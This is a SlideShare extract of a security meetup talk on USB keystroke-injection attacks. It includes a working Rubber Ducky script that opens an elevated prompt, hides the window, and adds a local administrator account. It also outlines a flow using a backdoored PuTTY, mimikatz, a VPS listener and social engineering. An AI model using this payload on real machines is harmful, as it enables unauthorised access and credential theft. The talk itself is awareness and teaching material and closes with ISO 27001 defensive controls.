SlideShare a Scribd company logo
Meetup	#4
IT	Audit	and	Security
Removable	Disk	Hacking	for	Fun	and	Profit
@rungga_reksya
Incident	Classification Patterns2015	Data	Breach	Investigations	Report
2
831
Hacking	– Use	of	stolen	
credentials
817
Hacking	– Use	of	backdoor
817
Social	- Phishing
812
Malware	– Spyware	/	Key	
Logger
40%Web	App	Attack
Top	10	Threat	action	varieties	within	Web	App	
Attack	breaches,	(n=879)
Financial	Gain
What	is
Motivationfor	Attack ?
Intellectual	
Property	Theft
Disruption	of	
Service
Theft	of	Classified	
Data
32%
24%
10%
Source:
ISACA	and	RSA	Conference	Survey	
2015
19%
Theft	of	
Personality	
Identifiable
11%
Mr.	Robot
S01-E06
&
Hacker	Movie	2016
5
The	USB	Rubber	Ducky	($44.99)	is	a	Human	Interface	Device	
programmable	with	a	simple	scripting	language	allowing	
penetration	testers	to	quickly	and	easily	craft	and	deploy	
security	auditing	payloads	that	mimic	human	keyboard	input.	
The	source	is	written	in	C	and	requires	the	AVR	Studio	5	IDE	
from	atmel.com/avrstudio.	Hardware	is	commercially	available	
at	hakshop.com.	Tools	and	payloads	can	be	found	at	
usbrubberducky.com.	Quack!
Source:	https://github.com/hak5darren/USB-Rubber-Ducky
Rubber	Duck
Ducky Script 6
Ducky	Script	syntax	is	simple.	Each	command	resides	on	a	new	line	and	
may	have	options	follow.	Commands	are	written	in	ALL	CAPS,	because	
ducks	are	loud	and	like	to	quack	with	pride.	Most	commands	invoke	
keystrokes,	key-combos	or	strings	of	text,	while	some	offer	delays	or	
pauses.	Below	is	a	list	of	commands	and	their	function,	followed	by	
some	example	usage.
Note:	In	the	tables	below	//n//	represents	a	number	and	//Char//	
represents	characters	A-Z,	a-z.
REM:	Similar	to	the	REM	command	in	Basic	and	other	languages,	lines	beginning	with	
REM	will	not	be	processed.	REM	is	a	comment.
DELAY:	creates	a	momentary	pause	in	the	ducky	script.	It	is	quite	handy	for	creating	a	
moment	of	pause	between	sequential	commands	that	may	take	the	target	computer	
some	time	to	process.	DELAY	time	is	specified	in	milliseconds	from	1	to	10000.
STRING:	processes	the	text	following	taking	special	care	to	auto-shift.	STRING	can	
accept	a	single	or	multiple	characters.
Ducky	Script	is	the	language	of	the	USB	Rubber	Ducky.	Writing	
scripts	for	can	be	done	from	any	common	ascii text	editor	such	as	
Notepad,	vi,	emacs,	nano,	gedit,	kedit,	TextEdit,	etc.
Extended	Commands:	ENTER,	BREAK,	CAPSLOCK,	DELETE,	END,	ESC,	HOME,	
PRINTSCREEN,	etc
Rubber	Duck	Scriptfor	Fun	and	Profit
7
REM	Add	user	dulu
DELAY	3000
CONTROL	ESCAPE
DELAY	1000
STRING	cmd
DELAY	1000
CTRL-SHIFT	
ENTER
DELAY	1000
ALT	y
DELAY	300
ENTER
ALT	SPACE	
DELAY	1000
STRING	m	
DELAY	1000
DOWNARROW
REPEAT	100
ENTER
STRING	net	user	miicas password.123	/add	
ENTER
STRING	net	localgroup administrators	miicas /add
ENTER
My	ScriptFake	Putty
https://www.offensive-
security.com/metasploit-
unleashed/backdooring-exe-files/
Mimikatz
https://github.com/gentilkiwi
/mimikatz
Net	User
#	net	user	miicas/add
#	net	localgroup administrators	
miicas/add
Removable Disk Hacking for Fun and Profit
General	Flow
Tested	on	Windows	Server	2008	R2	and	Attacker	OS	is	Kali	Linux
9
Deploy
“puttyremote.exe”	&“mimikatz.exe”
put	into	“/var/www/html/”
Create	Payload	in	
Rubber	Duck
Listen	on	VPS
Social	
Engineering
Success
Rubber	Duck
How	to	Control	?
10
11.2.9 8.3.111.2.8 12.2
Unattended	user	equipment
Protection	from	Malware
Clear	Screen	Policy
Mgmt.	Media	Removable
Rungga Reksya Sabilillah,	ST,	MMSI
LA	ISO	27001,	LA	ISO	20000,	LA	ISO	22301,	OSCP,	CEH,	ECSA,	CND
Thank	YouFor	Your	Attention

More Related Content

PDF
Gunadarma workshop security
PPTX
How to assign a CVE to yourself?
PDF
OWASP Mobile Top 10
PDF
The New OWASP Top Ten: Let's Cut to the Chase
PDF
Penetration and hacking training brief
PDF
Footprinting
PPTX
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
PDF
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
Gunadarma workshop security
How to assign a CVE to yourself?
OWASP Mobile Top 10
The New OWASP Top Ten: Let's Cut to the Chase
Penetration and hacking training brief
Footprinting
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
OWASP Top 10 - The Ten Most Critical Web Application Security Risks

What's hot (20)

PPTX
Ethical hacking
PDF
Cyber Kill Chain: Web Application Exploitation
PDF
OWASP Mobile Top 10 Deep-Dive
PPTX
Owasp mobile top 10
PPT
Penetration Testing Basics
PDF
DON'T Use Two-Factor Authentication...Unless You Need It!
PDF
OWASP Thailand-Beyond the Penetration Testing
PDF
Owasp Mobile Top 10 - M7 & M8
PDF
Mobile Defense-in-Dev (Depth)
PPTX
Network software gotovaya
PPTX
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
PPTX
Addressing the OWASP Mobile Security Threats using Xamarin
PDF
PPTX
OWASP Mobile TOP 10 2014
PDF
Hacking Cracking 2008
DOCX
FBI & Secret Service- Business Email Compromise Workshop
PDF
Analysis of RSA Lockheed Martin Attack
PPTX
black hat deephish
PPTX
Ethical Hacking & Penetration Testing
PDF
How to find Zero day vulnerabilities
Ethical hacking
Cyber Kill Chain: Web Application Exploitation
OWASP Mobile Top 10 Deep-Dive
Owasp mobile top 10
Penetration Testing Basics
DON'T Use Two-Factor Authentication...Unless You Need It!
OWASP Thailand-Beyond the Penetration Testing
Owasp Mobile Top 10 - M7 & M8
Mobile Defense-in-Dev (Depth)
Network software gotovaya
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Addressing the OWASP Mobile Security Threats using Xamarin
OWASP Mobile TOP 10 2014
Hacking Cracking 2008
FBI & Secret Service- Business Email Compromise Workshop
Analysis of RSA Lockheed Martin Attack
black hat deephish
Ethical Hacking & Penetration Testing
How to find Zero day vulnerabilities

Similar to Removable Disk Hacking for Fun and Profit (20)

PPTX
Password cracking and brute force tools
PPTX
Learn Hacking With Gflixacademy
PDF
Hacking Exposed: The Mac Attack
PDF
Hacking Exposed: The Mac Attack
PPTX
Lecture about network and host security to NII students
PPT
Hacking Presentation
PPSX
Ethical Hacking, Its relevance and Its Prospects
PPTX
PPTX
Parag presentation on ethical hacking
PPTX
Ethical hacking
PDF
E security and payment 2013-1
PPTX
Ethical hacking for Business or Management.pptx
PPTX
Web Application Security
PDF
AI is Hacking You - Digital Workplace Conference Australia 2024
PPTX
Password Attack
PPTX
Gamifying Ethical hacking for education.pptx
PDF
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
PPTX
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PPTX
Chapter 7 -Network Security Concept.pptx
Password cracking and brute force tools
Learn Hacking With Gflixacademy
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
Lecture about network and host security to NII students
Hacking Presentation
Ethical Hacking, Its relevance and Its Prospects
Parag presentation on ethical hacking
Ethical hacking
E security and payment 2013-1
Ethical hacking for Business or Management.pptx
Web Application Security
AI is Hacking You - Digital Workplace Conference Australia 2024
Password Attack
Gamifying Ethical hacking for education.pptx
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
Chapter 7 -Network Security Concept.pptx

Recently uploaded (20)

PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Spectral efficient network and resource selection model in 5G networks
PDF
Network Security Unit 5.pdf for BCA BBA.
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PDF
Review of recent advances in non-invasive hemoglobin estimation
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
DOCX
The AUB Centre for AI in Media Proposal.docx
PDF
Encapsulation theory and applications.pdf
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PPTX
Programs and apps: productivity, graphics, security and other tools
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PPTX
Spectroscopy.pptx food analysis technology
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Encapsulation_ Review paper, used for researhc scholars
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
Understanding_Digital_Forensics_Presentation.pptx
Spectral efficient network and resource selection model in 5G networks
Network Security Unit 5.pdf for BCA BBA.
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Review of recent advances in non-invasive hemoglobin estimation
20250228 LYD VKU AI Blended-Learning.pptx
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Advanced methodologies resolving dimensionality complications for autism neur...
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
The AUB Centre for AI in Media Proposal.docx
Encapsulation theory and applications.pdf
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Building Integrated photovoltaic BIPV_UPV.pdf
Programs and apps: productivity, graphics, security and other tools
Chapter 3 Spatial Domain Image Processing.pdf
Spectroscopy.pptx food analysis technology
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Encapsulation_ Review paper, used for researhc scholars
Digital-Transformation-Roadmap-for-Companies.pptx
The Rise and Fall of 3GPP – Time for a Sabbatical?

Removable Disk Hacking for Fun and Profit